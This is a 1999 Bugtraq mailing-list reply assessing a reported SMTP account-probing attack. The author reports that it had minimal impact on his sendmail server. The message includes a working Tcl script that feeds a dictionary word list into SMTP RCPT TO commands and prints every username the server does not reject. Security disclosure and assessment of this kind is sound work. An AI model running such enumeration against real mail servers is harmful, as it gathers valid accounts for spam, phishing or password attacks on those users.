[9852] in bugtraq
Re: SMTP server account probing
daemon@ATHENA.MIT.EDU (David Gale)
Tue Mar 9 13:48:37 1999
Date: Tue, 9 Mar 1999 13:14:06 -0500
Reply-To: David Gale <dgale@DATAPEX.COM>
From: David Gale <dgale@DATAPEX.COM>
X-To: Brett Glass <brett@LARIAT.ORG>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <4.1.19990308115212.041b17b0@localhost>
On Mon, 8 Mar 1999, Brett Glass wrote:
> Several ISPs throughout the Net are reporting an attack described at
>
> http://www.l8r.com/nwa/nwa1.htm
Using /usr/dict/words on my linux box and the TCL code below I ran this
attack against a sendmail (8.9.2) mailserver which uses virtual user
tables and a lengthy aliases database.
The result was the load went up slightly and log entries consumed some
disk space. All in All, Minimal threat to service. I would not call this a
DOS attack in our configuration.
#!/usr/bin/tclsh
set infile [open /usr/dict/words r]
set sock [socket someserver.example.com 25]
puts $sock "HELO remotehost.example.com"
puts $sock "MAIL FROM: user@example.com"
while {[eof $infile] != 1} {
gets $infile input
puts $sock "RCPT TO: $input"
flush $sock
gets $sock output
if {[string range $output 0 2] != "550"} {
puts "Valid Username! $input"
}
}
close $sock
exit
DG.
